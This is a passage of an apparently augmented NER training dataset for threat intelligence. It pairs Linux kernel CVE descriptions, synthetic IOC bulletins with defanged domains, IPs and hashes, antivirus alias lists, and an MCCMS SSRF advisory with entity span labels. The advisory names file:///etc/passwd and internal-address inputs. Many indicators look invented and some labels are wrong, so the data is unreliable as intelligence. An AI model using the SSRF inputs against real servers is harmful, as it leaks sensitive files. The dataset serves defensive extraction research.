this\nflag set, sync kicks off writeback of dirty inodes but does not wait\nfor the flusher threads to complete the writeback.\n\nThis replaces the per-inode AS_NO_DATA_INTEGRITY mapping flag added in\ncommit f9a49aa302a0 (\"fs/writeback: skip AS_NO_DATA_INTEGRITY mappings\nin wait_sb_inodes()\"). The flag belongs at the superblock level because\ndata integrity is a filesystem-wide property, not a per-inode one.\nHaving this flag at the superblock level also allows us to skip having\nto iterate every dirty inode in wait_sb_inodes() only to skip each inode\nindividually.\n\nPrior to this commit, mappings with no data integrity guarantees skipped\nwaiting on writeback completion but still waited on the flusher threads\nto finish initiating the writeback. Waiting on the flusher threads is\nunnecessary. This commit kicks off writeback but does not wait on the\nflusher threads. 
This change properly addresses a recent report [1] for\na suspend-to-RAM hang seen on fuse-overlayfs that was caused by waiting\non the flusher threads to finish:\n\nWorkqueue: pm_fs_sync pm_fs_sync_work_fn\nCall Trace:\n \n __schedule+0x457/0x1720\n schedule+0x27/0xd0\n wb_wait_for_completion+0x97/0xe0\n sync_inodes_sb+0xf8/0x2e0\n __iterate_supers+0xdc/0x160\n ksys_sync+0x43/0xb0\n pm_fs_sync_work_fn+0x17/0xa0\n process_one_work+0x193/0x350\n worker_thread+0x1a1/0x310\n kthread+0xfc/0x240\n ret_from_fork+0x243/0x280\n ret_from_fork_asm+0x1a/0x30\n \n\nOn fuse this is problematic because there are paths that may cause the\nflusher thread to block (eg if systemd freezes the user session cgroups\nfirst, which freezes the fuse daemon, before invoking the kernel\nsuspend. The kernel suspend triggers ->write_node() which on fuse issues\na synchronous setattr request, which cannot be processed since the\ndaemon is frozen. Or if the daemon is buggy and cannot properly complete\nwriteback, initiating writeback on a dirty folio already under writeback\nleads to writeback_get_folio() -> folio_prepare_writeback() ->\nunconditional wait on writeback to finish, which will cause a hang).\nThis commit restores fuse to its prior behavior before tmp folios were\nremoved, where sync was essentially a no-op.\n\n[1] hxxps://lore[ . ]kernel[ . ]org/linux-fsdevel/CAJnrk1a-asuvfrbKXbEwwDSctvemF+6zfhdnuzO65Pt8HsFSRw@mail.gmail.com/T/#m632c4648e9cafc4239299887109ebd880ac6c5c1", "spans": {"Indicator: https://lore.kernel.org/linux-fsdevel/CAJnrk1a-asuvfrbKXbEwwDSctvemF+6zfhdnuzO65Pt8HsFSRw@mail.gmail.com/T/#m632c4648e9cafc4239299887109ebd880ac6c5c1": [[2455, 2612]], "System: Linux kernel": [[7, 19]], "System: systemd": [[1810, 1817]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2026-31465"}} {"text": "Microsoft MSRC detected a multi-stage attack chain. The initial phishing email from contact@secure-verify[.]net contained a link to hxxps://dataapi[.]cc/login. 
This redirected to hxxps://cacheproxy[ . ]live/assets/js/payload.js on authlogin[ . ]live. A secondary email from hr@phishing-domain[ . ]com pointed to hxxps://portal-data[ . ]tech/admin/config which delivered BlackCat. The final payload callback was hxxps://backup-login[.]live/download/update.exe resolving to 192[.]147[.]168[.]77 via cloud-secure[.]io.", "spans": {"Organization: Microsoft MSRC": [[0, 14]], "Indicator: contact@secure-verify.net": [[84, 111]], "Indicator: hxxps://dataapi.cc/login": [[132, 158]], "Indicator: hxxps://cacheproxy.live/assets/js/payload.js": [[179, 227]], "Indicator: authlogin.live": [[231, 249]], "Indicator: hr@phishing-domain.com": [[274, 300]], "Indicator: hxxps://portal-data.tech/admin/config": [[312, 353]], "Malware: BlackCat": [[370, 378]], "Indicator: hxxps://backup-login.live/download/update.exe": [[411, 458]], "Indicator: 192.147.168.77": [[472, 492]], "Indicator: cloud-secure.io": [[497, 514]]}, "info": {"id": "synth_v2_01782", "source": "defanged_augment"}} {"text": "IOC Bulletin - Latrodectus Campaign:\nNetwork Indicators:\n- 192[.]43[.]50[.]103\n- 95[.]225[.]205[.]126\n- 193 [ . ] 204 [ . ] 190 [ . ] 210\n- gatewayportal[.]site\n- proxyportal[ . ]com\nURLs:\n- hxxps://update-node[.]top/admin/config\n- hxxps://cache-gateway[.]info/secure/token\nEmail Senders:\n- security@secure-verify[ . 
]net\n- verify@auth-check[.]org\nFile Indicators:\n- SHA1: 1a69fa1df9c84cd5c8854e75f7b92a8da68083da\n- MD5: 2ef6bc7ac3d5b6d1862ed6a1320e4b96\n- Drop path: C:\\Users\\admin\\AppData\\Local\\Temp\\agent.py", "spans": {"Malware: Latrodectus": [[15, 26]], "Indicator: 192.43.50.103": [[59, 78]], "Indicator: 95.225.205.126": [[81, 101]], "Indicator: 193.204.190.210": [[104, 137]], "Indicator: gatewayportal.site": [[140, 160]], "Indicator: proxyportal.com": [[163, 182]], "Indicator: https://update-node.top/admin/config": [[191, 229]], "Indicator: https://cache-gateway.info/secure/token": [[232, 273]], "Indicator: security@secure-verify.net": [[291, 321]], "Indicator: verify@auth-check.org": [[324, 347]], "Indicator: 1a69fa1df9c84cd5c8854e75f7b92a8da68083da": [[373, 413]], "Indicator: 2ef6bc7ac3d5b6d1862ed6a1320e4b96": [[421, 453]]}, "info": {"id": "synth_v2_01418", "source": "defanged_augment"}} {"text": "The library is an older version of the “ DWN_DLL_MAIN[.]dll ” ( md5: ce8b99df8642c065b6af43fde1f786a3 ) .", "spans": {"Indicator: DWN_DLL_MAIN.dll": [[41, 59]], "Indicator: ce8b99df8642c065b6af43fde1f786a3": [[69, 101]]}, "info": {"id": "cyberner_stix_train_007604", "source": "defanged_augment"}} {"text": "Forensic Investigation Notes: Analysis of the compromised host revealed CrackMapExec artifacts at C:\\Users\\Public\\Documents\\update.dll. Memory dump analysis confirmed execution of Sliver. Registry modifications pointed to persistence via C:\\Program Files\\Common Files\\csrss.exe. Network forensics identified connections to 190[.]221[.]121[.]192 and static-cache[ . ]net. Email headers traced the initial vector to report@document-share[.]link. File /home/user/.config/winlogon.exe (MD5: 957c97c1ca25e1785d27696c248975cd) was identified as the initial dropper. A staging URL hxxp://storagelogin[.]com/portal/verify resolved to 84 [ . ] 155 [ . ] 61 [ . ] 201. 
Secondary artifact hash: MD5: 741e805361b89941c2bf2026ec7852c2.", "spans": {"Indicator: 190.221.121.192": [[323, 344]], "Indicator: static-cache.net": [[349, 369]], "Indicator: report@document-share.link": [[414, 442]], "Indicator: 957c97c1ca25e1785d27696c248975cd": [[487, 519]], "Indicator: http://storagelogin.com/portal/verify": [[574, 613]], "Indicator: 84.155.61.201": [[626, 657]], "Indicator: 741e805361b89941c2bf2026ec7852c2": [[689, 721]]}, "info": {"id": "synth_v2_01158", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/msm: Fix GEM free for imported dma-bufs\n\nImported dma-bufs also have obj->resv != &obj->_resv. So we should\ncheck both this condition in addition to flags for handling the\n_NO_SHARE case.\n\nFixes this splat that was reported with IRIS video playback:\n\n ------------[ cut here ]------------\n WARNING: CPU: 3 PID: 2040 at drivers/gpu/drm/msm/msm_gem.c:1127 msm_gem_free_object+0x1f8/0x264 [msm]\n CPU: 3 UID: 1000 PID: 2040 Comm: .gnome-shell-wr Not tainted 6.17.0-rc7 #1 PREEMPT\n pstate: 81400005 (Nzcv daif +PAN -UAO -TCO +DIT -SSBS BTYPE=--)\n pc : msm_gem_free_object+0x1f8/0x264 [msm]\n lr : msm_gem_free_object+0x138/0x264 [msm]\n sp : ffff800092a1bb30\n x29: ffff800092a1bb80 x28: ffff800092a1bce8 x27: ffffbc702dbdbe08\n x26: 0000000000000008 x25: 0000000000000009 x24: 00000000000000a6\n x23: ffff00083c72f850 x22: ffff00083c72f868 x21: ffff00087e69f200\n x20: ffff00087e69f330 x19: ffff00084d157ae0 x18: 0000000000000000\n x17: 0000000000000000 x16: ffffbc704bd46b80 x15: 0000ffffd0959540\n x14: 0000000000000000 x13: 0000000000000000 x12: 0000000000000000\n x11: ffffbc702e6cdb48 x10: 0000000000000000 x9 : 000000000000003f\n x8 : ffff800092a1ba90 x7 : 0000000000000000 x6 : 0000000000000020\n x5 : ffffbc704bd46c40 x4 : fffffdffe102cf60 x3 : 0000000000400032\n x2 : 0000000000020000 x1 : ffff00087e6978e8 x0 : ffff00087e6977e8\n Call trace:\n msm_gem_free_object+0x1f8/0x264 [msm] 
(P)\n drm_gem_object_free+0x1c/0x30 [drm]\n drm_gem_object_handle_put_unlocked+0x138/0x150 [drm]\n drm_gem_object_release_handle+0x5c/0xcc [drm]\n drm_gem_handle_delete+0x68/0xbc [drm]\n drm_gem_close_ioctl+0x34/0x40 [drm]\n drm_ioctl_kernel+0xc0/0x130 [drm]\n drm_ioctl+0x360/0x4e0 [drm]\n __arm64_sys_ioctl+0xac/0x104\n invoke_syscall+0x48/0x104\n el0_svc_common.constprop.0+0x40/0xe0\n do_el0_svc+0x1c/0x28\n el0_svc+0x34/0xec\n el0t_64_sync_handler+0xa0/0xe4\n el0t_64_sync+0x198/0x19c\n ---[ end trace 0000000000000000 ]---\n ------------[ cut here ]------------\n\nPatchwork: hxxps://patchwork[ . ]freedesktop[ . ]org/patch/676273/", "spans": {"Indicator: https://patchwork.freedesktop.org/patch/676273/": [[2132, 2187]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-68189"}} {"text": "Lookout researchers have identified a new , highly targeted surveillanceware family known as Desert Scorpion in the Google Play Store . Tools and capabilities used by HIDDEN COBRA actors include DDoS botnets , keyloggers , remote access tools ( RATs ) , and wiper malware . The latest versions of PowerArchiver 2019 and WinRar displayed in their respective UI the executable SHIPPING_MX00034900_PL_INV_pdf[ . ]exe as the only content of the ZIP . 
However , lessons learned this year can help organizations take proactive steps to protect themselves from ransomware in 2023 .", "spans": {"Organization: Lookout": [[0, 7]], "Malware: Desert Scorpion": [[93, 108]], "System: Google Play Store": [[116, 133]], "Indicator: SHIPPING_MX00034900_PL_INV_pdf.exe": [[375, 413]]}, "info": {"id": "cyberner_stix_train_004568", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nax25: fix incorrect dev_tracker usage\n\nWhile investigating a separate rose issue [1], and enabling\nCONFIG_NET_DEV_REFCNT_TRACKER=y, Bernard reported an orthogonal ax25 issue [2]\n\nAn ax25_dev can be used by one (or many) struct ax25_cb.\nWe thus need different dev_tracker, one per struct ax25_cb.\n\nAfter this patch is applied, we are able to focus on rose.\n\n[1] hxxps://lore[ . ]kernel[ . ]org/netdev/fb7544a1-f42e-9254-18cc-c9b071f4ca70@free.fr/\n\n[2]\n[ 205.798723] reference already released.\n[ 205.798732] allocated in:\n[ 205.798734] ax25_bind+0x1a2/0x230 [ax25]\n[ 205.798747] __sys_bind+0xea/0x110\n[ 205.798753] __x64_sys_bind+0x18/0x20\n[ 205.798758] do_syscall_64+0x5c/0x80\n[ 205.798763] entry_SYSCALL_64_after_hwframe+0x44/0xae\n[ 205.798768] freed in:\n[ 205.798770] ax25_release+0x115/0x370 [ax25]\n[ 205.798778] __sock_release+0x42/0xb0\n[ 205.798782] sock_close+0x15/0x20\n[ 205.798785] __fput+0x9f/0x260\n[ 205.798789] ____fput+0xe/0x10\n[ 205.798792] task_work_run+0x64/0xa0\n[ 205.798798] exit_to_user_mode_prepare+0x18b/0x190\n[ 205.798804] syscall_exit_to_user_mode+0x26/0x40\n[ 205.798808] do_syscall_64+0x69/0x80\n[ 205.798812] entry_SYSCALL_64_after_hwframe+0x44/0xae\n[ 205.798827] ------------[ cut here ]------------\n[ 205.798829] WARNING: CPU: 2 PID: 2605 at lib/ref_tracker.c:136 ref_tracker_free.cold+0x60/0x81\n[ 205.798837] Modules linked in: rose netrom mkiss ax25 rfcomm cmac algif_hash algif_skcipher af_alg bnep snd_hda_codec_hdmi nls_iso8859_1 i915 rtw88_8821ce 
rtw88_8821c x86_pkg_temp_thermal rtw88_pci intel_powerclamp rtw88_core snd_hda_codec_realtek snd_hda_codec_generic ledtrig_audio coretemp snd_hda_intel kvm_intel snd_intel_dspcfg mac80211 snd_hda_codec kvm i2c_algo_bit drm_buddy drm_dp_helper btusb drm_kms_helper snd_hwdep btrtl snd_hda_core btbcm joydev crct10dif_pclmul btintel crc32_pclmul ghash_clmulni_intel mei_hdcp btmtk intel_rapl_msr aesni_intel bluetooth input_leds snd_pcm crypto_simd syscopyarea processor_thermal_device_pci_legacy sysfillrect cryptd intel_soc_dts_iosf snd_seq sysimgblt ecdh_generic fb_sys_fops rapl libarc4 processor_thermal_device intel_cstate processor_thermal_rfim cec snd_timer ecc snd_seq_device cfg80211 processor_thermal_mbox mei_me processor_thermal_rapl mei rc_core at24 snd intel_pch_thermal intel_rapl_common ttm soundcore int340x_thermal_zone video\n[ 205.798948] mac_hid acpi_pad sch_fq_codel ipmi_devintf ipmi_msghandler drm msr parport_pc ppdev lp parport ramoops pstore_blk reed_solomon pstore_zone efi_pstore ip_tables x_tables autofs4 hid_generic usbhid hid i2c_i801 i2c_smbus r8169 xhci_pci ahci libahci realtek lpc_ich xhci_pci_renesas [last unloaded: ax25]\n[ 205.798992] CPU: 2 PID: 2605 Comm: ax25ipd Not tainted 5.18.11-F6BVP #3\n[ 205.798996] Hardware name: To be filled by O.E.M. 
To be filled by O.E.M./CK3, BIOS 5.011 09/16/2020\n[ 205.798999] RIP: 0010:ref_tracker_free.cold+0x60/0x81\n[ 205.799005] Code: e8 d2 01 9b ff 83 7b 18 00 74 14 48 c7 c7 2f d7 ff 98 e8 10 6e fc ff 8b 7b 18 e8 b8 01 9b ff 4c 89 ee 4c 89 e7 e8 5d fd 07 00 <0f> 0b b8 ea ff ff ff e9 30 05 9b ff 41 0f b6 f7 48 c7 c7 a0 fa 4e\n[ 205.799008] RSP: 0018:ffffaf5281073958 EFLAGS: 00010286\n[ 205.799011] RAX: 0000000080000000 RBX: ffff9a0bd687ebe0 RCX: 0000000000000000\n[ 205.799014] RDX: 0000000000000001 RSI: 0000000000000282 RDI: 00000000ffffffff\n[ 205.799016] RBP: ffffaf5281073a10 R08: 0000000000000003 R09: fffffffffffd5618\n[ 205.799019] R10: 0000000000ffff10 R11: 000000000000000f R12: ffff9a0bc53384d0\n[ 205.799022] R13: 0000000000000282 R14: 00000000ae000001 R15: 0000000000000001\n[ 205.799024] FS: 0000000000000000(0000) GS:ffff9a0d0f300000(0000) knlGS:0000000000000000\n[ 205.799028] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[ 205.799031] CR2: 00007ff6b8311554 CR3: 000000001ac10004 CR4: 00000000001706e0\n[ 205.799033] Call Trace:\n[ 205.799035] \n[ 205.799038] ? ax25_dev_device_down+0xd9/\n---truncated---", "spans": {"Indicator: https://lore.kernel.org/netdev/fb7544a1-f42e-9254-18cc-c9b071f4ca70@free.fr/": [[430, 514]], "System: Linux kernel": [[7, 19]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2022-50163"}} {"text": "PlugX C2 server : ipsoftwarelabs[ . ]com .", "spans": {"Malware: PlugX": [[0, 5]], "Indicator: ipsoftwarelabs.com": [[18, 40]]}, "info": {"id": "cyberner_stix_train_002179", "source": "defanged_augment"}} {"text": "MCCMS v2.7.0 has an SSRF vulnerability located in the index() method of the sys\\apps\\controllers\\api\\Gf.php file, where the pic parameter is processed. The pic parameter is decrypted using the sys_auth($pic, 1) function, which utilizes a hard-coded key Mc_Encryption_Key (bD2voYwPpNuJ7B8), defined in the db.php file. 
The decrypted URL is passed to the geturl() method, which uses cURL to make a request to the URL without proper security checks. An attacker can craft a malicious encrypted pic parameter, which, when decrypted, points to internal addresses or local file paths (such as http://127 [ . ] 0 [ . ] 0 [ . ] 1 or file://). By using the file:// protocol, the attacker can access arbitrary files on the local file system (e.g., file:///etc/passwd, file:///C:/Windows/System32/drivers/etc/hosts), allowing them to read sensitive configuration files, log files, and more, leading to information leakage or system exposure. The danger of this SSRF vulnerability includes accessing internal services and local file systems through protocols like hxxp://, ftp://, and file://, which can result in sensitive data leakage, remote code execution, privilege escalation, or full system compromise, severely affecting the system's security and stability.", "spans": {"Indicator: 127.0.0.1": [[594, 621]], "Indicator: http://,": [[1052, 1060]], "System: cURL": [[381, 385]], "Vulnerability: remote code execution": [[1126, 1147]], "Vulnerability: privilege escalation": [[1149, 1169]], "Vulnerability: SSRF": [[20, 24], [950, 954]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2025-50234"}} {"text": "A backdoor also known as: Trojan.Strictor.D1B6BC BKDR_HPKELIHOS.SM4 Win32.Trojan.WisdomEyes.16070401.9500.9990 BKDR_HPKELIHOS.SM4 BehavesLike[.]Win32[.]Expiro[.]ch Trojan.WPCracker.u Trojan.Win32.Boaxxe W32/Injector.DDXZ!tr", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Expiro.ch": [[130, 163]]}, "info": {"id": "cyner2_train_003033", "source": "defanged_augment"}} {"text": "Incident Response Summary: On detection of anomalous traffic to 179[.]64[.]220[.]180, the CrowdStrike IR team identified Latrodectus running as C:\\Users\\admin\\AppData\\Local\\Temp\\helper.sh. 
The threat actor, believed to be Ember Bear, used BloodHound for credential harvesting and Ligolo for lateral movement. Exfiltrated data was sent to static-mail[.]tech and storage-gateway[.]dev. The initial dropper (SHA1: 292b2a2795416121d57cc5a9d9a5d83cdd84821d) was delivered via a phishing email from helpdesk@identity-verify[.]cc. A second C2 node was observed at 141 [ . ] 70 [ . ] 59 [ . ] 113, with a persistence mechanism writing to /var/tmp/chrome_helper.exe.", "spans": {"Indicator: 179.64.220.180": [[64, 84]], "Organization: CrowdStrike": [[90, 101]], "Malware: Latrodectus": [[121, 132]], "Indicator: static-mail.tech": [[338, 356]], "Indicator: storage-gateway.dev": [[361, 382]], "Indicator: 292b2a2795416121d57cc5a9d9a5d83cdd84821d": [[411, 451]], "Indicator: helpdesk@identity-verify.cc": [[493, 522]], "Indicator: 141.70.59.113": [[557, 588]]}, "info": {"id": "synth_v2_00414", "source": "defanged_augment"}} {"text": "IOC Bulletin - BumbleBee Campaign:\nNetwork Indicators:\n- 10[.]45[.]97[.]146\n- 10[.]10[.]40[.]28\n- 192[.]134[.]10[.]103\n- syncnode[.]io\n- storagenode[ . ]online\nURLs:\n- hxxp://backup-mail[.]org/api/v2/auth\n- hxxp://apisync[ . ]xyz/collect\nEmail Senders:\n- updates@mail-service[.]info\n- it@credential-check[ . 
]site\nFile Indicators:\n- MD5: fff247031ec7bd8e09b2bdfeed816ee2\n- MD5: 58fffedd9d9f1a954694d4d13470f228\n- Drop path: /tmp/winlogon.exe", "spans": {"Malware: BumbleBee": [[15, 24]], "Indicator: 10.45.97.146": [[57, 75]], "Indicator: 10.10.40.28": [[78, 95]], "Indicator: 192.134.10.103": [[98, 118]], "Indicator: syncnode.io": [[121, 134]], "Indicator: storagenode.online": [[137, 159]], "Indicator: http://backup-mail.org/api/v2/auth": [[168, 204]], "Indicator: http://apisync.xyz/collect": [[207, 237]], "Indicator: updates@mail-service.info": [[255, 282]], "Indicator: it@credential-check.site": [[285, 313]], "Indicator: fff247031ec7bd8e09b2bdfeed816ee2": [[338, 370]], "Indicator: 58fffedd9d9f1a954694d4d13470f228": [[378, 410]]}, "info": {"id": "synth_v2_01420", "source": "defanged_augment"}} {"text": "Multiple AsyncRAT samples identified:\n- SHA256: 20d4346443b1e9cf1ae0a388f969997489c5defccbc9c2c40ea2a98c382ac697\n- SHA256: b77958e427f54145fc2b6d719ba846367b5b496ca30879504b0b5331899ed4d8\n- MD5: 8f277b34e7ed296d4d1f69048f0ab2da\n- MD5: 2caa8607b73a1e1f0b406621489d1f5b\nAll samples beacon to 176 [ . ] 70 [ . ] 254 [ . ] 237 and malware-drop[[.]]net.", "spans": {"Malware: AsyncRAT": [[9, 17]], "Indicator: 20d4346443b1e9cf1ae0a388f969997489c5defccbc9c2c40ea2a98c382ac697": [[48, 112]], "Indicator: b77958e427f54145fc2b6d719ba846367b5b496ca30879504b0b5331899ed4d8": [[123, 187]], "Indicator: 8f277b34e7ed296d4d1f69048f0ab2da": [[195, 227]], "Indicator: 2caa8607b73a1e1f0b406621489d1f5b": [[235, 267]], "Indicator: 176.70.254.237": [[290, 322]], "Indicator: malware-drop[.]net": [[327, 347]]}, "info": {"id": "synth_00011", "source": "defanged_augment"}} {"text": "Phishing Campaign Report: Rapid7 identified a large-scale phishing operation. Emails originated from updates@secure-verify[ . ]net and security@document-share[ . ]link, spoofing legitimate services. Victims were directed to hxxps://cloud-mail[ . 
]com/callback which hosted a credential harvesting page on login-data[.]tech. A secondary link hxxp://node-backup[.]io/portal/verify delivered SystemBC (SHA256: 4f37ce1a20322a17f0fa7cb7787a9e35b63b63eaab1641d071b3664b9a81fb1c). The malware was saved to /home/user/.config/update.dll and established C2 with 186[.]214[.]193[.]141.", "spans": {"Organization: Rapid7": [[26, 32]], "Indicator: updates@secure-verify.net": [[101, 130]], "Indicator: security@document-share.link": [[135, 167]], "Indicator: hxxps://cloud-mail.com/callback": [[224, 259]], "Indicator: login-data.tech": [[305, 322]], "Indicator: http://node-backup.io/portal/verify": [[341, 378]], "Malware: SystemBC": [[389, 397]], "Indicator: 4f37ce1a20322a17f0fa7cb7787a9e35b63b63eaab1641d071b3664b9a81fb1c": [[407, 471]], "Indicator: 186.214.193.141": [[553, 574]]}, "info": {"id": "synth_v2_00922", "source": "defanged_augment"}} {"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: send: fix buffer overflow detection when copying path to cache entry\n\nStarting with commit c0247d289e73 (\"btrfs: send: annotate struct\nname_cache_entry with __counted_by()\") we annotated the variable length\narray \"name\" from the name_cache_entry structure with __counted_by() to\nimprove overflow detection. However that alone was not correct, because\nthe length of that array does not match the \"name_len\" field - it matches\nthat plus 1 to include the NUL string terminator, so that makes a\nfortified kernel think there's an overflow and report a splat like this:\n\n strcpy: detected buffer overflow: 20 byte write of buffer size 19\n WARNING: CPU: 3 PID: 3310 at __fortify_report+0x45/0x50\n CPU: 3 UID: 0 PID: 3310 Comm: btrfs Not tainted 6.11.0-prnet #1\n Hardware name: CompuLab Ltd. 
sbc-ihsw/Intense-PC2 (IPC2), BIOS IPC2_3.330.7 X64 03/15/2018\n RIP: 0010:__fortify_report+0x45/0x50\n Code: 48 8b 34 (...)\n RSP: 0018:ffff97ebc0d6f650 EFLAGS: 00010246\n RAX: 7749924ef60fa600 RBX: ffff8bf5446a521a RCX: 0000000000000027\n RDX: 00000000ffffdfff RSI: ffff97ebc0d6f548 RDI: ffff8bf84e7a1cc8\n RBP: ffff8bf548574080 R08: ffffffffa8c40e10 R09: 0000000000005ffd\n R10: 0000000000000004 R11: ffffffffa8c70e10 R12: ffff8bf551eef400\n R13: 0000000000000000 R14: 0000000000000013 R15: 00000000000003a8\n FS: 00007fae144de8c0(0000) GS:ffff8bf84e780000(0000) knlGS:0000000000000000\n CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n CR2: 00007fae14691690 CR3: 00000001027a2003 CR4: 00000000001706f0\n Call Trace:\n \n ? __warn+0x12a/0x1d0\n ? __fortify_report+0x45/0x50\n ? report_bug+0x154/0x1c0\n ? handle_bug+0x42/0x70\n ? exc_invalid_op+0x1a/0x50\n ? asm_exc_invalid_op+0x1a/0x20\n ? __fortify_report+0x45/0x50\n __fortify_panic+0x9/0x10\n __get_cur_name_and_parent+0x3bc/0x3c0\n get_cur_path+0x207/0x3b0\n send_extent_data+0x709/0x10d0\n ? find_parent_nodes+0x22df/0x25d0\n ? mas_nomem+0x13/0x90\n ? mtree_insert_range+0xa5/0x110\n ? btrfs_lru_cache_store+0x5f/0x1e0\n ? iterate_extent_inodes+0x52d/0x5a0\n process_extent+0xa96/0x11a0\n ? __pfx_lookup_backref_cache+0x10/0x10\n ? __pfx_store_backref_cache+0x10/0x10\n ? __pfx_iterate_backrefs+0x10/0x10\n ? __pfx_check_extent_item+0x10/0x10\n changed_cb+0x6fa/0x930\n ? tree_advance+0x362/0x390\n ? memcmp_extent_buffer+0xd7/0x160\n send_subvol+0xf0a/0x1520\n btrfs_ioctl_send+0x106b/0x11d0\n ? __pfx___clone_root_cmp_sort+0x10/0x10\n _btrfs_ioctl_send+0x1ac/0x240\n btrfs_ioctl+0x75b/0x850\n __se_sys_ioctl+0xca/0x150\n do_syscall_64+0x85/0x160\n ? __count_memcg_events+0x69/0x100\n ? handle_mm_fault+0x1327/0x15c0\n ? __se_sys_rt_sigprocmask+0xf1/0x180\n ? syscall_exit_to_user_mode+0x75/0xa0\n ? do_syscall_64+0x91/0x160\n ? 
do_user_addr_fault+0x21d/0x630\n entry_SYSCALL_64_after_hwframe+0x76/0x7e\n RIP: 0033:0x7fae145eeb4f\n Code: 00 48 89 (...)\n RSP: 002b:00007ffdf1cb09b0 EFLAGS: 00000246 ORIG_RAX: 0000000000000010\n RAX: ffffffffffffffda RBX: 0000000000000004 RCX: 00007fae145eeb4f\n RDX: 00007ffdf1cb0ad0 RSI: 0000000040489426 RDI: 0000000000000004\n RBP: 00000000000078fe R08: 00007fae144006c0 R09: 00007ffdf1cb0927\n R10: 0000000000000008 R11: 0000000000000246 R12: 00007ffdf1cb1ce8\n R13: 0000000000000003 R14: 000055c499fab2e0 R15: 0000000000000004\n \n\nFix this by not storing the NUL string terminator since we don't actually\nneed it for name cache entries, this way \"name_len\" corresponds to the\nactual size of the \"name\" array. This requires marking the \"name\" array\nfield with __nonstring and using memcpy() instead of strcpy() as\nrecommended by the guidelines at:\n\n hxxps://github[.]com/KSPP/linux/issues/90", "spans": {"Indicator: https://github.com/KSPP/linux/issues/90": [[3670, 3711]], "System: Linux kernel": [[7, 19]], "Vulnerability: buffer overflow": [[86, 101], [660, 675]]}, "info": {"source": "defanged_augment", "cve_id": "CVE-2024-49869"}} {"text": "From 2013 Carbanak intensified its activity focused on banks and electronic payment systems in Russia and in the post-Soviet space . By looking at our telemetry , we found evidence that Turla installers were exfiltrating information to get[.]adobe[.]com URLs since at least July 2016 .", "spans": {"Malware: Carbanak": [[10, 18]], "Organization: banks": [[55, 60]], "Organization: electronic payment": [[65, 83]], "Organization: space": [[125, 130]], "Indicator: get.adobe.com": [[236, 253]]}, "info": {"id": "cyberner_stix_train_006279", "source": "defanged_augment"}} {"text": "A backdoor also known as: Trojan.Qhost Trojan/KillProc.b Win.Trojan.4904185-1 Trojan.Inject.10975 Trojan.Win32.FakeAV TR/Qhost[ . ]DK.1 W32/Qhost[.]BE!tr Trojan:Win64/Qhost[ . 
]DK Trj/CI.A Win32/Trojan.1ea", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Qhost.DK": [[121, 133], [167, 179]], "Indicator: Qhost.BE": [[140, 150]]}, "info": {"id": "cyner2_train_007092", "source": "defanged_augment"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9951 Worm.BAT.Autorun.ex TrojWare.Win32.StartPage.~AO Win32.HLLW.Autoruner2.11336 Worm.AutoRun.Win32.42154 BehavesLike[ . ]Win32[ . ]Virus[ . ]cz Trojan-Dropper.Win32.Autorun Worm.BAT.al Win32.HeurC.KVM007.a.kcloud Worm.BAT.Autorun.ex TrojanDropper:Win32/Autorun.AC Worm/Win32.AutoRun.R74164 TScope.Trojan.Delf Trj/CI.A BAT/Autorun.BK Bat.Worm.Autorun.Aihw BAT/Autorun.EX!worm", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: BehavesLike.Win32.Virus.cz": [[171, 209]]}, "info": {"id": "cyner2_train_001537", "source": "defanged_augment"}} {"text": "A backdoor also known as: Trojan.Tinba.WR4 Trojan/Tinba[.]be Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Backdoor2.HYQY Trojan.Win32.Inject.dqhpeo TrojWare.Win32.Tinba.BD Trojan.PWS.Tinba.153 Dropper.Injector.Win32.66634 Trojan.Win32.Exploit W32/Backdoor.DVHN-3684 TrojanDropper.Injector.avtd TR/Crypt.Xpack.182297 Trojan[Dropper]/Win32.Injector Trojan/Win32.Small.R145411 TrojanDropper.Injector Trojan.Symmi.DD5E0 Win32/Tinba[.]BE Trojan.DR.Injector!OJez9sRxlMc W32/Deshacop.XO!tr", "spans": {"Malware: backdoor": [[2, 10]], "Indicator: Tinba.be": [[50, 60]], "Indicator: Tinba.BE": [[424, 434]]}, "info": {"id": "cyner2_train_000803", "source": "defanged_augment"}} {"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G Virus.Virut.Win32.1939 W32[.]Virut[.]CF Win32/Virut.17408 PE_VIRUX.S-3 Win.Worm.Taz-1 Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg PE_VIRUX.S-3 Win32/Virut.bt Virus/Win32.Virut.ce Trojan:Win32/VBloader.B Virus.Win32.Virut.ce Win32/Virut.F Virus.Virut.14 Win32/Virut.NBP Trojan-Banker.Win32.Bancos W32/Sality.AO Virus.Win32.VirutChangeEntry.A", "spans": {"Malware: backdoor": [[2, 10]], 
